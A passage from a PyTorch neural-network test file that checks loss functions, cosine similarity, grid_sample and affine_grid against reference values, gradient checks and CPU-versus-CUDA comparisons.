x1, x2, x3, swap=True, reduction='none'), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, swap=True, reduction='none'),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, swap=True, reduction='none'))
def test_pointwise_loss_target_grad_none_reduction(self):
i = torch.randn(5, 10)
t = torch.randn(5, 10, requires_grad=True)
self.assertEqual(F.mse_loss(i, t, reduction='none').size(), t.size())
self.assertEqual(F.l1_loss(i, t, reduction='none').size(), t.size())
def test_pointwise_loss_broadcast(self):
losses = {
'mse_loss': lambda x, y, r: F.mse_loss(x, y, reduction=r),
'l1_loss': lambda x, y, r: F.l1_loss(x, y, reduction=r),
'smooth_l1_loss': lambda x, y, r: F.smooth_l1_loss(x, y, reduction=r),
'huber_loss': lambda x, y, r: F.huber_loss(x, y, reduction=r),
}
input = torch.randn(2, 1, requires_grad=True)
for _name, fn in losses.items():
for requires_grad in [True, False]:
# When target.requires_grad=True, its impl is in Python, while the other is in TH.
target = torch.randn(2, 10, requires_grad=requires_grad)
for reduction in ['none', 'mean', 'sum']:
l = fn(input, target, reduction)
if reduction == 'none':
self.assertEqual(l.size(), target.size())
self.assertTrue(gradcheck(fn, (input, target, reduction)))
# https://github.com/pytorch/pytorch/issues/27692 reports
# that l1_loss get a wrong result for big batch size
def test_l1_loss_correct(self):
for dtype in [torch.float, torch.cfloat]:
for N in range(1, 50, 10):
input = torch.rand(N, 3, 1024, 1024, dtype=dtype)
self.assertEqual(
torch.nn.L1Loss()(input, torch.zeros_like(input)),
input.abs().mean())
def test_smoothl1loss_integral_target(self):
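# Integral targets should behave as if cast to float: the input gradient
# must match the gradient obtained with an explicit target.float().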
def _input_grad(input, target, reduction):
output = F.smooth_l1_loss(input, target, reduction=reduction, beta=0.5)
output.sum().backward()
return input.grad
for device, dtype, reduction in product(device_(),
integral_types(),
('none', 'sum', 'mean')):
input = torch.randn(2, 2, device=device, requires_grad=True)
target = torch.randint(0, 9, (2, 2), device=device, dtype=dtype)
input_grad_with_float_target = _input_grad(input, target.float(), reduction)
input_grad = _input_grad(input.detach().clone().requires_grad_(True),
target,
reduction)
self.assertEqual(input_grad, input_grad_with_float_target)
def test_smoothl1loss_negative_beta_not_supported(self):
with self.assertRaises(RuntimeError):
F.smooth_l1_loss(torch.randn(2, 2), torch.randn(2, 2), beta=-1.0)
def test_huber_loss_invalid_delta(self):
def _test_huber_loss_delta_error_helper(delta):
input, target = torch.randn(2, 2), torch.randn(2, 2)
loss = torch.nn.HuberLoss(delta=delta)
with self.assertRaises(RuntimeError):
loss(input, target)
def test_huber_loss_negative_delta():
_test_huber_loss_delta_error_helper(delta=-0.5)
def test_huber_loss_zero_delta():
_test_huber_loss_delta_error_helper(delta=0.0)
test_huber_loss_negative_delta()
test_huber_loss_zero_delta()
def test_cosine_similarity(self):
# Check cosine_similarity input/output shapes
input_size = (1, 3, 2, 1)
expected_size = (1, 2, 1)
input1 = torch.randn(input_size, requires_grad=True)
input2 = torch.randn(input_size, requires_grad=True)
self.assertEqual(F.cosine_similarity(input1, input2, dim=1).size(), expected_size)
# Check numerical precision, issue #18057
vv1 = torch.tensor([float(i) for i in range(84)]).unsqueeze(0)
vv2 = torch.tensor([float(i) for i in range(84)]).unsqueeze(0)
out = F.cosine_similarity(vv1, vv2)
self.assertLessEqual(out, 1.0)
# Check dividing by 0.
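# cosine_similarity clamps the denominator away from zero, so a zero vector
# yields a zero gradient for input1 and a large but finite gradient for
# input2 (scaled by the reciprocal of the clamp epsilon).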
input1 = torch.randn(10).requires_grad_()
input2 = torch.zeros_like(input1).requires_grad_()
torch.cosine_similarity(input1, input2, 0).sum().backward()
self.assertEqual(input1.grad, torch.zeros_like(input1))
self.assertEqual(input2.grad, input1 * 1e8)
# Check error when inputs are not the same shape
input1 = torch.randn(2, 2, 1)
input2 = torch.randn(2, 1, 3)
with self.assertRaises(RuntimeError):
F.cosine_similarity(input1, input2)
# Check type promotion, issue #61454
input = torch.tensor(12.)
out = F.cosine_similarity(input.to(torch.int8), input, dim=-1)
self.assertEqual(out, 1.)
def test_grid_sample_error_checking(self):
input = torch.empty(1, 1, 2, 2)
grid = torch.empty(1, 1, 1, 2)
# assert no error
F.grid_sample(input, grid, align_corners=False)
with self.assertRaisesRegex(ValueError, "but got: 'garbage'"):
F.grid_sample(input, grid, mode='garbage', align_corners=False)
with self.assertRaisesRegex(ValueError, "but got: 'garbage'"):
F.grid_sample(input, grid, padding_mode='garbage', align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected input and grid to have same dtype"):
F.grid_sample(input.float(), grid.double(), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected 4D or 5D input"):
F.grid_sample(input[0], grid, align_corners=False)
with self.assertRaisesRegex(RuntimeError, "grid with same number of dimensions"):
F.grid_sample(input, torch.empty(1, 1, 1, 1, 3), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected grid and input to have same batch size"):
F.grid_sample(input, torch.empty(2, 1, 1, 2), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected grid to have size 2 in last dimension"):
F.grid_sample(input, torch.empty(1, 1, 1, 3), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected input to have non-empty spatial dimensions"):
F.grid_sample(torch.empty(1, 1, 0, 2), grid, align_corners=False)
with self.assertRaisesRegex(RuntimeError, "bicubic interpolation only supports 4D input"):
F.grid_sample(torch.empty(1, 1, 2, 2, 2), torch.empty(1, 1, 1, 1, 3), mode='bicubic')
if TEST_CUDA:
with self.assertRaisesRegex(RuntimeError, "expected input and grid to be on same device"):
F.grid_sample(input.cuda(), grid, align_corners=False)
def test_affine_grid_error_checking(self):
# 2D affine
theta = torch.empty(1, 2, 3, dtype=torch.double)
size = torch.Size([1, 1, 2, 2])
# assert no error
F.affine_grid(theta, size, align_corners=False)
# check for warning for empty span along dimension
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Should not trigger warning
F.affine_grid(theta, torch.Size([1, 1, 2, 1]), align_corners=False)
# Check no warning occurs
self.assertNotIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
# Should trigger warning
F.affine_grid(theta, torch.Size([1, 1, 2, 1]), align_corners=True)
# Check warning occurs
self.assertIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
with self.assertRaisesRegex(ValueError, "Expected theta to have floating point type"):
F.affine_grid(theta.int(), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta[0], size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.unsqueeze(0), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.repeat(1, 2, 1), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.repeat(1, 1, 2), size, align_corners=False)
# 3D affine
theta = torch.empty(1, 3, 4, dtype=torch.double)
size = torch.Size([1, 1, 2, 2, 2])
# assert no error
F.affine_grid(theta, size, align_corners=False)
# check for warning for empty span along dimension
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Should not trigger warning
F.affine_grid(theta, torch.Size([1, 1, 3, 2, 1]), align_corners=False)
# Check no warning occurs
self.assertNotIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
# Should trigger warning
F.affine_grid(theta, torch.Size([1, 1, 3, 2, 1]), align_corners=True)
# Check warning occurs
self.assertIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta[0], size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.unsqueeze(0), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.repeat(1, 2, 1), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.repeat(1, 1, 2), size, align_corners=False)
with self.assertRaisesRegex(NotImplementedError, "affine_grid only supports 4D and 5D sizes"):
F.affine_grid(theta, torch.Size([1, 2, 2]), align_corners=False)
with self.assertRaisesRegex(NotImplementedError, "affine_grid only supports 4D and 5D sizes"):
F.affine_grid(theta, torch.Size([1, 1, 2, 2, 2, 2]), align_corners=False)
@skipIfRocm
def test_grid_sample(self):
def test(N, C, H, W, mode, padding_mode, align_corners):
def test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners):
for grid_dim_contig_order in [(0, 1, 2, 3), (0, 3, 1, 2), (3, 0, 1, 2), (0, 2, 1, 3)]:
# grid_dim_contig_order specifies the dimension order that can
# make grid to be contiguous.
# i.e., grid.permute(grid_dim_contig_order) is contiguous.
# e.g., with grid_dim_contig_order=[0, 3, 1, 2], grid should be
# initialized with contiguous tensor of shape [N, 2, H, W]
# and permuted to [N, H, W, 2] afterwards.
grid_shape = [N, H, W, 2]
grid_init_shape = [grid_shape[d] for d in grid_dim_contig_order]
grid_fwd_permute = [None, None, None, None]
for i, d in enumerate(grid_dim_contig_order):
grid_fwd_permute[d] = i
def get_grid(device='cpu', data=None):
if data is not None:
assert list(data.shape) == grid_shape
data = data.permute(grid_dim_contig_order).to(device)
else:
data = torch.randn(grid_init_shape, device=device)
grid = data.permute(grid_fwd_permute)
assert grid.permute(grid_dim_contig_order).is_contiguous()
return grid
input_cpu = torch.randn(C, N, IH, IW).transpose(0, 1).requires_grad_()
grid_cpu = get_grid().requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertTrue(out_cpu.size() == torch.Size([N, C, H, W]))
gradients = torch.randn_like(out_cpu)
out_cpu.backward(gradients)
# Compare against unvectorized CPU fallback
# NOTE [ grid_sample CPU fallback ]
# grid_sample uses AVX for 2d images, but that requires 32-bit indexing for
# 32-bit floats. So we also have a fallback that is used only for float tensors
# requiring 64-bit indexing. That requires too much memory to run on CI, so we
# also export the fallback and test it here to ensure feature parity with
# the vectorized version.
input_fallback = input_cpu.float().detach_().requires_grad_()
grid_fallback = grid_cpu.float().detach_().requires_grad_()
out_fallback = torch._grid_sampler_2d_cpu_fallback(
input_fallback, grid_fallback,
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners)
self.assertEqual(out_fallback, out_cpu.float(), atol=1e-5, rtol=5e-5)
out_fallback.backward(gradients.float())
self.assertEqual(input_fallback.grad, input_cpu.grad.float(), atol=1e-4, rtol=5e-5)
self.assertEqual(grid_fallback.grad, grid_cpu.grad.float(), atol=1e-4, rtol=5e-5)
if TEST_CUDA:
input_cuda = input_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
grid_cuda = get_grid('cuda', grid_cpu.detach()).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
out_cuda.backward(gradients.cuda())
self.assertEqual(input_cpu.grad, input_cuda.grad)
self.assertEqual(grid_cpu.grad, grid_cuda.grad, atol=5e-5, rtol=0)
# check that zero-dimensional input strides don't error out
base_input = torch.randn(N, C, 1, IW)
input_cpu = base_input.expand_as(input_cuda).requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
input_cuda = base_input.cuda().expand_as(input_cuda).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
# test same size output
test_shape(N, C, H, W, H, W, mode, padding_mode, align_corners)
# test larger output
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(IH + 1, 12)
W = random.randint(IW + 1, 12)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# test smaller output
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(2, IH)
W = random.randint(2, IW)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# test 1x1 input
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = 1
IW = 1
H = random.randint(2, 5)
W = random.randint(2, 5)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# testing empty grid
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
W = random.randint(3, IW + 2)
test_shape(N, C, IH, IW, 0, W, mode, padding_mode, align_corners)
# testing empty channel
N = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(N, 0, IH, IW, H, W, mode, padding_mode, align_corners)
# testing empty batch
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(0, C, IH, IW, H, W, mode, padding_mode, align_corners)
for mode in ('bilinear', 'nearest', 'bicubic'):
for padding_mode in ('zeros', 'border', 'reflection'):
for align_corners in (True, False):
# test known input on CPU
input = torch.arange(1., 11).view(1, 1, 2, 5)
grid = torch.tensor(
[[[-0.9, -4.1], [0, 0.2000], [1, -1], [-0.333, 1e-6], [0.5, 1.0]],
[[-1.0, -0.5], [0, 0.3333], [1, -1], [-0.200, 1e-6], [1.5, 0.5]]]).view(1, 2, 5, 2)
if mode == 'bilinear':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[0.0000, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 0.0000]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.0000, 6.5000000000, 1.2500, 4.6675000191, 4.6250],
[0.5000, 7.1665000916, 1.2500, 5.0000000000, 0.0000]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1.2000, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 8.7500]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1.0000, 6.5000000000, 5.0000, 4.6675000191, 9.2500],
[1.0000, 7.1665000916, 5.0000, 5.0000000000, 10.0000]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[3.4500, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 7.7500]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[3.0000004768, 6.5000000000, 5.0000, 4.6675000191, 9.2500],
[1.0000000000, 7.1665000916, 5.0000, 5.0000000000, 9.2500]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'nearest':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[0., 8., 5., 7., 9.],
[1., 8., 5., 8., 0.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0., 8., 5., 7., 0.],
[1., 8., 5., 8., 0.]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 10.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 10.]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 9.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 9.]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'bicubic':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[-0.10424726, 7.1400003, 5.0000, 5.7842274, 9.0000],
[2.4492188, 7.4814040, 5.0000, 6.0277520, 0.0000]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.00000, 7.6287503, 1.0625, 5.5977230, 5.3270264],
[0.40625, 8.0288770, 1.0625, 5.9375067, -0.3515625]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1.1520010, 6.0599990, 5.0000, 4.870930, 9.0000000],
[2.1328125, 6.4258375, 5.0000, 5.076003, 8.8671875]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.894531, 6.6050020, 4.625, 4.7138715, 9.800781],
[0.906250, 7.2822485, 4.625, 5.0000052, 10.00000]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[3.1822524, 6.239998, 5.0000, 4.8709273, 9.00000],
[1.7812500, 6.703594, 5.0000, 5.0760007, 8.21875]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[2.7993753, 6.6050020, 4.25, 4.7138715, 10.269531],
[0.8125000, 7.2822485, 4.25, 5.0000052, 9.332031]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
else:
raise AssertionError("missing groundtruth test for interpolation mode '{}'".format(mode))
output = F.grid_sample(input, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(output, groundtruth, atol=1e-5, rtol=0,
msg="groundtruth comparison failed for mode={}, "
"padding_mode={}".format(mode, padding_mode))
# See NOTE [ grid_sample CPU fallback ]
output = torch._grid_sampler_2d_cpu_fallback(
input.float(), grid.float(),
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners)
self.assertEqual(output, groundtruth.float(), atol=1e-5, rtol=0)
# explicit check for gradient edge cases
input = torch.arange(0., 5).expand((1, 1, 5, 5)).requires_grad_()
grid = torch.tensor(
[[[1.0, 1.0], [1.0, -1.0], [0.8, 0.8], [0.8, -0.8]],
[[-1.0, -1.0], [-1.0, 1.0], [-0.8, -0.8], [-0.8, 0.8]]]).view(1, 2, 4, 2).requires_grad_()
if mode == 'bilinear':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[[[-8., -8.], [-8., 0.], [2., 0.], [2., 0.]],
[[2., 0.], [2., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-5., -5.], [-5., 5.], [-10., -10.], [-10., 10.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [2., 0.], [2., 0.]],
[[0., 0.], [0., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [2., 0.], [2., 0.]],
[[0., 0.], [0., 0.], [2., 0.], [2., 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
else:
raise AssertionError("missing gradient groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'nearest':
groundtruth = torch.tensor(
[[[[-0., -0.], [-0., 0.], [-0., -0.], [-0., 0.]],
[[0., 0.], [0., 0.], [0., 0.], [0., 0.]]]]).view(1, 2, 4, 2)
elif mode == 'bicubic':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[[[-4.5, -6.], [-4.5, 6.], [2.725679, 0.740878], [2.725679, -0.740878]],
[[1.5, 0.], [1.5, 0.], [1.927921, -0.05688], [1.927921, 0.05688]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-5.859375, -5.888672], [-5.859375, 5.888672], [-5.6250, -7.5000], [-5.6250, 7.5000]],
[[-0.234375, -0.263672], [-0.234375, 0.263672], [1.8750, 0.], [1.8750, 0.]]]]
).view(1, 2, 4, 2)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[[[1.5, 0.], [1.5, 0.], [1.74, 0.], [1.74, 0.]],
[[1.5, 0.], [1.5, 0.], [1.74, 0.], [1.74, 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[-0.46875, 0.], [-0.46875, 0.], [1.8750, 0.], [1.8750, 0.]],
[[-0.46875, 0.], [-0.46875, 0.], [1.8750, 0.], [1.8750, 0.]]]]).view(1, 2, 4, 2)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[[[0., 0.], [0., 0.], [1.92, 0.], [1.92, 0.]],
[[0., 0.], [0., 0.], [1.92, 0.], [1.92, 0.]]]]).view(1, 2, 4, 2)
else:
groundtruth = torch.tensor(
[[[[0., 0.], [0., 0.], [1.875, 0.], [1.875, 0.]],
[[0., 0.], [0., 0.], [1.875, 0.], [1.875, 0.]]]]).view(1, 2, 4, 2)
else:
raise AssertionError("missing gradient groundtruth test for padding mode '{}'".format(padding_mode))
else:
raise AssertionError("missing gradient groundtruth test for interpolation mode '{}'".format(mode))
F.grid_sample(input, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners).sum().backward()
self.assertEqual(grid.grad, groundtruth, atol=1e-5, rtol=0,
msg="gradient groundtruth comparison failed for mode={}, "
"padding_mode={}".format(mode, padding_mode))
# See NOTE [ grid_sample CPU fallback ]
grid.grad.zero_()
torch._grid_sampler_2d_cpu_fallback(
input.float(), grid.float(),
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners).sum().backward()
self.assertEqual(grid.grad, groundtruth, atol=1e-5, rtol=0)
# do gradcheck
N = random.randint(2, 8)
C = random.randint(2, 6)
H = random.randint(2, 8)
W = random.randint(2, 8)
input = torch.randn(N, C, H, W, requires_grad=True)
grid = torch.randn(N, H, W, 2, requires_grad=True)
self.assertTrue(gradcheck(
lambda inp, grid: F.grid_sample(inp, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners),
(input, grid)))
test(N, C, H, W, mode, padding_mode, align_corners=align_corners)
if TEST_CUDNN:
with cudnn.flags(enabled=False):
test(N, C, H, W, mode, padding_mode, align_corners=align_corners)
def test_grid_sample_3d(self):
def test(N, C, D, H, W, mode, padding_mode, align_corners):
def test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners):
input_cpu = torch.randn(C, N, ID, IH, IW).transpose(0, 1).requires_grad_()
grid_cpu = torch.randn(D, N, H, W, 3).transpose(0, 1).requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertTrue(out_cpu.size() == torch.Size([N, C, D, H, W]))
gradients = torch.randn_like(out_cpu)
out_cpu.backward(gradients)
if TEST_CUDA:
input_cuda = input_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
grid_cuda = grid_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
out_cuda.backward(gradients.cuda())
self.assertEqual(input_cpu.grad, input_cuda.grad)
self.assertEqual(grid_cpu.grad, grid_cuda.grad, atol=5e-5, rtol=0)
# check that zero-dimensional input strides don't error out
base_input = torch.randn(N, C, 1, IH, IW)
input_cpu = base_input.expand_as(input_cuda).requires_grad_()
grid_cpu = torch.randn(N, D, H, W, 3, requires_grad=True)
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
input_cuda = base_input.cuda().expand_as(input_cuda).requires_grad_()
grid_cuda = grid_cpu.detach().cuda().requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
# test same size output
test_shape(N, C, D, H, W, D, H, W, mode, padding_mode, align_corners)
# test larger output
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(ID + 1, 10)
H = random.randint(IH + 1, 10)
W = random.randint(IW + 1, 10)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# test smaller output
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(2, ID)
H = random.randint(2, IH)
W = random.randint(2, IW)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# test 1x1 input
N = random.randint(2, 7)
C = random.randint(2, 7)
ID = 1
IH = 1
IW = 1
H = random.randint(2, 5)
W = random.randint(2, 5)
test_shape(N, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# testing empty grid
N = random.randint(2, 7)
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
W = random.randint(3, IW + 2)
test_shape(N, C, ID, IH, IW, D, 0, W, mode, padding_mode, align_corners)
# testing empty channel
N = random.randint(2, 7)
ID = random.randint(2, 5)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(N, 0, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
# testing empty batch
C = random.randint(2, 5)
ID = random.randint(2, 7)
IH = random.randint(2, 7)
IW = random.randint(2, 7)
D = random.randint(3, ID + 2)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(0, C, ID, IH, IW, D, H, W, mode, padding_mode, align_corners)
for mode in ('bilinear', 'nearest'):
for padding_mode in ('zeros', 'border', 'reflection'):
for align_corners in (True, False):
# do gradcheck
N = random.randint(2, 5)
C = random.randint(2, 4)
D = random.randint(2, 5)
H = random.randint(2, 5)
W = random.randint(2, 5)
input = torch.randn(N, C, D, H, W, requires_grad=True)
grid = torch.randn(N, D, H, W, 3, requires_grad=True)
self.assertTrue(gradcheck(
lambda inp, grid: F.grid_sample(inp, grid, mode=mode, padding_mode=padding_mode,
align_corners=align_corners),
(input, grid)))
test(N, C, D, H, W, mode, padding_mode, align_corners)
def test_affine_grid(self):
# test known input on CPU
input = torch.arange(1., 7).view(1, 2, 3)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2]), align_corners=True)
groundtruth = torch.tensor(
[[[0., -3.], [2., 5.]], [[4., 7.], [6., 15.]]]).view(1, 2, 2, 2)
self.assertEqual(output, groundtruth)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2]), align_corners=False)
groundtruth = torch.tensor(
[[[1.5, 1.5], [2.5, 5.5]], [[3.5, 6.5], [4.5, 10.5]]]).view(1, 2, 2, 2)
self.assertEqual(output, groundtruth)
for align_corners in (True, False):
# do gradcheck
N = random.randint(1, 8)
C = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, H, W])
inp = torch.randn(N, 2, 3, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
self.assertTrue(gradcheck(
lambda inp: F.affine_grid(inp, sz, align_corners=align_corners),
(inp,)))
# test CPU against CUDA
if TEST_CUDA:
N = random.randint(1, 8)
C = random.randint(1, 8)
H = random.randint(1, 8)
W = random.randint(1, 8)
sz = torch.Size([N, C, H, W])
for align_corners in (True, False):
input_cpu = torch.randn(N, 2, 3, requires_grad=True)
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
out_cpu = F.affine_grid(input_cpu, sz, align_corners=align_corners)
gradients = torch.randn(out_cpu.size())
out_cpu.backward(gradients)
input_gpu = input_cpu.detach().cuda().requires_grad_()
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # reset the filter so later tests can still trigger warnings (needed on Python 2)
out_cuda = F.affine_grid(input_gpu, sz, align_corners=align_corners)
out_cuda.backward(gradients.cuda())
self.assertEqual(out_cpu, out_cuda)
self.assertEqual(input_cpu.grad, input_gpu.grad)
def test_affine_grid_3d(self):
# test known input on CPU
input = torch.arange(1., 13).view(1, 3, 4)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2, 2]), align_corners=True)
groundtruth = torch.tensor(
[[[[[-2., -10., -18.], [0., 0., 0.]], [[2., 2., 2.], [4., 12., 20.]]],
[[[4., 4., 4.], [6., 14., 22.]], [[8., 16., 24.], [10., 26., 42.]]]]]).view(1, 2, 2, 2, 3)
self.assertEqual(output, groundtruth)
output = F.affine_grid(input, torch.Size([1, 1, 2, 2, 2]), align_corners=False)
groundtruth = torch.tensor(
